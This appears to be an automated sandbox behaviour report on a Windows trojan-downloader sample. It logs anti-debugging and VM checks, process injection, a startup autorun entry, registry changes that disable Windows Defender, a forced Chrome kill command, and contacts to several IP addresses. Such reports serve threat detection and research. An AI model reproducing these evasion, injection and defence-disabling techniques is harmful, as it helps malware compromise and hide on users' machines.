Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: gcleaner.exe process_identifier: 3848		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: gcleaner.exe process_identifier: 3848		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: gcleaner.exe process_identifier: 3848		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 3944		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 3944		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 3944		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 3944		0	0
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 3944		0	0

Potentially malicious URLs were found in the process memory dump (2 events)

url	http://firstfloorsoftware.com/ModernUI
url	http://schemas.openxmlformats.org/markup-compatibility/2006

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (15 events)

Time & API	Arguments	Status	Return
RegOpenKeyExW Nov. 5, 2021, 8:59 a.m.	regkey_r: software\wow6432node\microsoft\windows\currentversion\uninstall\nmx 1.00 base_handle: 0xffffffff80000001 key_handle: 0x0000000000000000 options: 0 access: 0x00020019 regkey: HKEY_CURRENT_USER\software\wow6432node\microsoft\windows\currentversion\uninstall\nmx 1.00		2
RegOpenKeyExW Nov. 5, 2021, 8:59 a.m.	regkey_r: software\wow6432node\microsoft\windows\currentversion\uninstall\nmx 1.00 base_handle: 0xffffffff80000002 key_handle: 0x0000000000000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\uninstall\nmx 1.00		2
RegOpenKeyExW Nov. 5, 2021, 8:59 a.m.	regkey_r: software\wow6432node\microsoft\windows\currentversion\uninstall\nmx 1.00 base_handle: 0xffffffff80000000 key_handle: 0x0000000000000000 options: 0 access: 0x00020019 regkey: HKEY_CLASSES_ROOT\software\wow6432node\microsoft\windows\currentversion\uninstall\nmx 1.00		2
RegOpenKeyExW Nov. 5, 2021, 8:59 a.m.	regkey_r: software\wow6432node\microsoft\windows\currentversion\uninstall\nmx 1.00 base_handle: 0xffffffff80000005 key_handle: 0x0000000000000000 options: 0 access: 0x00020019 regkey: HKEY_CURRENT_CONFIG\software\wow6432node\microsoft\windows\currentversion\uninstall\nmx 1.00		2
RegOpenKeyExW Nov. 5, 2021, 8:59 a.m.	regkey_r: software\wow6432node\microsoft\windows\currentversion\uninstall\nmx 1.00 base_handle: 0xffffffff80000003 key_handle: 0x0000000000000000 options: 0 access: 0x00020019 regkey: HKEY_USERS\software\wow6432node\microsoft\windows\currentversion\uninstall\nmx 1.00		2
RegOpenKeyExW Nov. 5, 2021, 8:59 a.m.	regkey_r: software\microsoft\windows\currentversion\uninstall\nmx 1.00 base_handle: 0xffffffff80000001 key_handle: 0x0000000000000000 options: 0 access: 0x00020019 regkey: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\nmx 1.00		2
RegOpenKeyExW Nov. 5, 2021, 8:59 a.m.	regkey_r: software\microsoft\windows\currentversion\uninstall\nmx 1.00 base_handle: 0xffffffff80000002 key_handle: 0x0000000000000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\nmx 1.00		2
RegOpenKeyExW Nov. 5, 2021, 8:59 a.m.	regkey_r: software\microsoft\windows\currentversion\uninstall\nmx 1.00 base_handle: 0xffffffff80000000 key_handle: 0x0000000000000000 options: 0 access: 0x00020019 regkey: HKEY_CLASSES_ROOT\software\microsoft\windows\currentversion\uninstall\nmx 1.00		2
RegOpenKeyExW Nov. 5, 2021, 8:59 a.m.	regkey_r: software\microsoft\windows\currentversion\uninstall\nmx 1.00 base_handle: 0xffffffff80000005 key_handle: 0x0000000000000000 options: 0 access: 0x00020019 regkey: HKEY_CURRENT_CONFIG\software\microsoft\windows\currentversion\uninstall\nmx 1.00		2
RegOpenKeyExW Nov. 5, 2021, 8:59 a.m.	regkey_r: software\microsoft\windows\currentversion\uninstall\nmx 1.00 base_handle: 0xffffffff80000003 key_handle: 0x0000000000000000 options: 0 access: 0x00020019 regkey: HKEY_USERS\software\microsoft\windows\currentversion\uninstall\nmx 1.00		2
RegOpenKeyExW Nov. 5, 2021, 9:07 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\adblocker base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\adblocker		2
RegOpenKeyExW Nov. 5, 2021, 9:07 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome		2
RegOpenKeyExW Nov. 5, 2021, 9:07 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_CURRENT_USER\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome		2
RegOpenKeyExW Nov. 5, 2021, 9:07 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x000004b4 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1	0
RegOpenKeyExW Nov. 5, 2021, 9:07 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x000004b4 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1	0

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2548 CREDAT:145409
cmdline	cmd.exe /c taskkill /f /im chrome.exe
cmdline	C:\Program Files (x86)\Internet Explorer\iexplore.exe https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6

Communicates with host for which no DNS query was performed (10 events)

host	186.2.171.3
host	193.56.146.36
host	2.56.59.42
host	212.192.241.15
host	212.193.30.113
host	45.133.1.107
host	45.133.1.182
host	45.9.20.156
host	94.26.249.132
host	95.217.123.66

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Nov. 5, 2021, 9:07 a.m.	process_identifier: 4452 region_size: 131072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000020c	1	0	0

Checks for the presence of known windows from debuggers and forensic tools (42 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: File Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: Process Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: Registry Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: Registry Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: File Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: Process Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: File Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: Process Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: Registry Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Nov. 5, 2021, 9:07 a.m.	class_name: 18467-41 window_name:		0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Nov. 5, 2021, 9 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover

reg_value

"C:\Program Files (x86)\Microsoft Analysis Services\Xibijozhana.exe"

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Nov. 5, 2021, 9:07 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÂb'âà0* À@ jè@ØOÀÀðà¼ H.text `.rsrcÀÀ@@.relocà@B base_address: 0x00400000 process_identifier: 4452 process_handle: 0x0000020c	1	1
WriteProcessMemory Nov. 5, 2021, 9:07 a.m.	buffer: 0 HXÀhäh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsBapS Ulix(CompanyNameHmE8FileDescriptionJNe WNP0FileVersion4.2.5.2: InternalNameBkQI Cec.exez+LegalCopyrightCopyright 2020 © Ozs. All rights reserved.2LegalTrademarksDLfPB OriginalFilenameBkQI Cec.exe2 ProductNameBkQI Cec4ProductVersion4.2.8.28Assembly Version4.2.8.2DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x0041c000 process_identifier: 4452 process_handle: 0x0000020c	1	1
WriteProcessMemory Nov. 5, 2021, 9:07 a.m.	buffer: ,= base_address: 0x0041e000 process_identifier: 4452 process_handle: 0x0000020c	1	1
WriteProcessMemory Nov. 5, 2021, 9:07 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 4452 process_handle: 0x0000020c	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Nov. 5, 2021, 9:07 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÂb'âà0* À@ jè@ØOÀÀðà¼ H.text `.rsrcÀÀ@@.relocà@B base_address: 0x00400000 process_identifier: 4452 process_handle: 0x0000020c	1	1	0

Network activity contains more than one unique useragent (5 events)

process	kak.tmp	useragent	InnoDownloadPlugin/1.5
process	iexplore.exe	useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
process	BumperWW.exe	useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
process	BumperWW.exe	useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
process	vFZoCgl35XxVzh8qqcJB1_ox.exe	useragent	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3800 called NtSetContextThread to modify thread in remote process 4452
NtSetContextThread Nov. 5, 2021, 9:07 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4295978 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000358 process_identifier: 4452	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2548 resumed a thread in remote process 2672
Process injection	Process 3800 resumed a thread in remote process 4452
NtResumeThread Nov. 5, 2021, 9:06 a.m.	thread_handle: 0x00000360 suspend_count: 1 process_identifier: 2672	1	0	0
NtResumeThread Nov. 5, 2021, 9:07 a.m.	thread_handle: 0x00000358 suspend_count: 1 process_identifier: 4452	1	0	0

Detects Virtual Machines through their custom firmware (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Nov. 5, 2021, 9:07 a.m.	information_class: 76 (SystemFirmwareTableInformation)		3221225507	0

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: exception.instruction_r: ed e9 34 1e 00 00 c3 e9 91 d9 fc ff a0 c4 99 0e exception.symbol: z7cnf_kncwqg5qs37fhaootp+0x44b8b5 exception.instruction: in eax, dx exception.module: Z7cnF_KncwQG5qs37FHAoOtp.exe exception.exception_code: 0xc0000096 exception.offset: 4503733 exception.address: 0x175b8b5 registers.esp: 2948408 registers.edi: 22569755 registers.eax: 1447909480 registers.ebp: 20299776 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 13 registers.ecx: 10	1	0	0

Generates some ICMP traffic

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

2.56.59.42:80

Disables Windows Security features (8 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

Executed a process and injected code into it, probably while unpacking (50 out of 518 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Nov. 5, 2021, 9:05 a.m.	thread_identifier: 2420 thread_handle: 0x000000d0 process_identifier: 2416 current_directory: filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\is-0EQ3T.tmp\kak.tmp" /SL5="$3002C,506127,422400,C:\Users\test22\AppData\Local\Temp\kak.exe" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000000d4	1	1
NtResumeThread Nov. 5, 2021, 9:05 a.m.	thread_handle: 0x00000164 suspend_count: 1 process_identifier: 2416	1	0
CreateProcessInternalW Nov. 5, 2021, 9:05 a.m.	thread_identifier: 2564 thread_handle: 0x00000360 process_identifier: 2560 current_directory: C:\Users\test22\AppData\Local\Temp\is-BI6MO.tmp filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\is-BI6MO.tmp\DYbALA.exe" /S /UID=2709 filepath_r: stack_pivoted: 0 creation_flags: 67108864 (CREATE_DEFAULT_ERROR_MODE) inherit_handles: 0 process_handle: 0x00000364	1	1
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x00000000000000b4 suspend_count: 1 process_identifier: 2560	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x000000000000013c suspend_count: 1 process_identifier: 2560	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x0000000000000188 suspend_count: 1 process_identifier: 2560	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x00000000000001ac suspend_count: 1 process_identifier: 2560	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x0000000000000268 suspend_count: 1 process_identifier: 2560	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x0000000000000378 suspend_count: 1 process_identifier: 2560	1	0
CreateProcessInternalW Nov. 5, 2021, 8:58 a.m.	thread_identifier: 2728 thread_handle: 0x0000000000000708 process_identifier: 2724 current_directory: C:\Users\test22\AppData\Local\Temp\is-BI6MO.tmp filepath: C:\Users\test22\AppData\Local\Temp\ab-479ac-814-bb8a8-11130f0847f23\Lixygaevymi.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\ab-479ac-814-bb8a8-11130f0847f23\Lixygaevymi.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\ab-479ac-814-bb8a8-11130f0847f23\Lixygaevymi.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000700	1	1
CreateProcessInternalW Nov. 5, 2021, 8:58 a.m.	thread_identifier: 2836 thread_handle: 0x0000000000000710 process_identifier: 2832 current_directory: C:\Users\test22\AppData\Local\Temp\is-BI6MO.tmp filepath: C:\Users\test22\AppData\Local\Temp\4a-841a7-6ec-3f1a8-c322fd916228f\Hyvacaerufe.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\4a-841a7-6ec-3f1a8-c322fd916228f\Hyvacaerufe.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\4a-841a7-6ec-3f1a8-c322fd916228f\Hyvacaerufe.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000700	1	1
CreateProcessInternalW Nov. 5, 2021, 8:58 a.m.	thread_identifier: 2920 thread_handle: 0x0000000000000718 process_identifier: 2916 current_directory: C:\Users\test22\AppData\Local\Temp\is-BI6MO.tmp filepath: C:\Program Files\Windows Defender\EOUZNQTEXE\foldershare.exe track: 1 command_line: "C:\Program Files\Windows Defender\EOUZNQTEXE\foldershare.exe" /VERYSILENT filepath_r: C:\Program Files\Windows Defender\EOUZNQTEXE\foldershare.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000710	1	1
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x00000000000000b4 suspend_count: 1 process_identifier: 2724	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x0000000000000144 suspend_count: 1 process_identifier: 2724	1	0
NtGetContextThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x0000000000000144	1	0
NtGetContextThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x0000000000000144	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x0000000000000144 suspend_count: 1 process_identifier: 2724	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x000000000000018c suspend_count: 1 process_identifier: 2724	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x00000000000001ac suspend_count: 1 process_identifier: 2724	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x0000000000000260 suspend_count: 1 process_identifier: 2724	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x0000000000000370 suspend_count: 1 process_identifier: 2724	1	0
NtResumeThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x000000000000059c suspend_count: 1 process_identifier: 2724	1	0
CreateProcessInternalW Nov. 5, 2021, 8:59 a.m.	thread_identifier: 2544 thread_handle: 0x0000000000000678 process_identifier: 2548 current_directory: C:\Users\test22\AppData\Local\Temp\is-BI6MO.tmp filepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6 filepath_r: C:\Program Files (x86)\Internet Explorer\iexplore.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000670	1	1
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x00000000000000b4 suspend_count: 1 process_identifier: 2832	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x000000000000013c suspend_count: 1 process_identifier: 2832	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x0000000000000184 suspend_count: 1 process_identifier: 2832	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x000000000000019c suspend_count: 1 process_identifier: 2832	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x00000000000001ec suspend_count: 1 process_identifier: 2832	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x0000000000000288 suspend_count: 1 process_identifier: 2832	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x00000000000002e0 suspend_count: 1 process_identifier: 2832	1	0
NtResumeThread Nov. 5, 2021, 8:58 a.m.	thread_handle: 0x000000000000043c suspend_count: 1 process_identifier: 2832	1	0
NtGetContextThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec	1	0
NtGetContextThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec	1	0
NtResumeThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec suspend_count: 1 process_identifier: 2832	1	0
NtGetContextThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec	1	0
NtGetContextThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec	1	0
NtResumeThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec suspend_count: 1 process_identifier: 2832	1	0
NtGetContextThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec	1	0
NtGetContextThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec	1	0
NtResumeThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec suspend_count: 1 process_identifier: 2832	1	0
NtGetContextThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec	1	0
NtGetContextThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec	1	0
NtResumeThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec suspend_count: 1 process_identifier: 2832	1	0
NtGetContextThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec	1	0
NtGetContextThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec	1	0
NtResumeThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec suspend_count: 1 process_identifier: 2832	1	0
NtGetContextThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec	1	0
NtGetContextThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec	1	0
NtResumeThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec suspend_count: 1 process_identifier: 2832	1	0
NtGetContextThread Nov. 5, 2021, 8:59 a.m.	thread_handle: 0x00000000000001ec	1	0

File has been identified by 45 AntiVirus engines on VirusTotal as malicious (45 events)

Lionic	Trojan.Win32.Chebka.a!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Application.DealAlpha.1.Gen
FireEye	Application.DealAlpha.1.Gen
ALYac	Application.DealAlpha.1.Gen
Cylance	Unsafe
Sangfor	Trojan.Win32.Chebka.gen
K7AntiVirus	Trojan ( 0056e5201 )
Alibaba	TrojanDownloader:Win32/Chebka.495e5564
K7GW	Trojan ( 0056e5201 )
Cybereason	malicious.7c77da
Symantec	PUA.InstallCore
ESET-NOD32	multiple detections
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Trojan-Downloader.Win32.Chebka.gen
BitDefender	Application.DealAlpha.1.Gen
Avast	FileRepMalware
Tencent	Win32.Trojan-downloader.Chebka.Ljub
Sophos	Generic PUA KN (PUA)
DrWeb	Trojan.Siggen15.33937
VIPRE	Trojan.Win32.Generic!BT
TrendMicro	TrojanSpy.Win32.TRICKBOT.YXBKDZ
McAfee-GW-Edition	BehavesLike.Win32.AdwareFileTour.bm
